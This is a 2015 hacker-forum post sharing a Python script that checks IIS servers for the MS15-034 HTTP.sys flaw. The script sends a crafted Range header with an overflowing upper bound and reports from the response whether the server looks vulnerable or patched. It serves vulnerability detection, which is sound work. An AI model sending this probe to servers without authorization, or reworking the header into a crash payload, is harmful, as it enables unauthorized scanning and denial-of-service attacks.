搜索
查看: 2890|回复: 0

MS15-034 Checker

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2015-4-15 17:38:45 | 显示全部楼层 |阅读模式
  1. '''
  2. ___.                                   .___ __                         __  
  3. \_ |__   ____ ___.__. ____   ____    __| _//  |________ __ __  _______/  |_
  4. | __ \_/ __ <   |  |/  _ \ /    \ / __ |\  __\_  __ \ |  \/  ___/\  __\
  5. | \_\ \ ___/\___  (  <_> )   |  \/ /_/ | |  |  |  | \/  |  /\___ \ |  |  
  6. |___  /\___  > ____|\____/|___|  /\____ | |__|  |__|  |____//____  > |__|  
  7.     \/     \/\/                \/      \/                        \/        
  8.                                                            MS15-034 Checker

  9. Danger! This script has not been properly qa'd and will probably fail in terrible ways.
  10. It is based off a change in HTTP!UlpParseRange in which an error code is returned as a
  11. result of a call to HTTP!RtlULongLongAdd when evaluating the upper and lower range of
  12. an HTTP range request.
  13. -BF


  14. 8a8b2112 56              push    esi
  15. 8a8b2113 6a00            push    0
  16. 8a8b2115 2bc7            sub     eax,edi
  17. 8a8b2117 6a01            push    1
  18. 8a8b2119 1bca            sbb     ecx,edx
  19. 8a8b211b 51              push    ecx
  20. 8a8b211c 50              push    eax
  21. 8a8b211d e8bf69fbff      call    HTTP!RtlULongLongAdd (8a868ae1) ; here

  22. '''
  23. import socket
  24. import random

  25. ipAddr = ""
  26. hexAllFfff = "18446744073709551615"

  27. req1 = "GET / HTTP/1.0\r\n\r\n"
  28. req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"

  29. print "[*] Audit Started"
  30. client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  31. client_socket.connect((ipAddr, 80))
  32. client_socket.send(req1)
  33. boringResp = client_socket.recv(1024)
  34. if "Microsoft" not in boringResp:
  35.                 print "[*] Not IIS"
  36.                 exit(0)
  37. client_socket.close()
  38. client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  39. client_socket.connect((ipAddr, 80))
  40. client_socket.send(req)
  41. goodResp = client_socket.recv(1024)
  42. if "Requested Range Not Satisfiable" in goodResp:
  43.                 print "[!!] Looks VULN"
  44. elif " The request has an invalid header name" in goodResp:
  45.                 print "[*] Looks Patched"
  46. else:
  47.                 print "[*] Unexpected response, cannot discern patch status"
复制代码
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表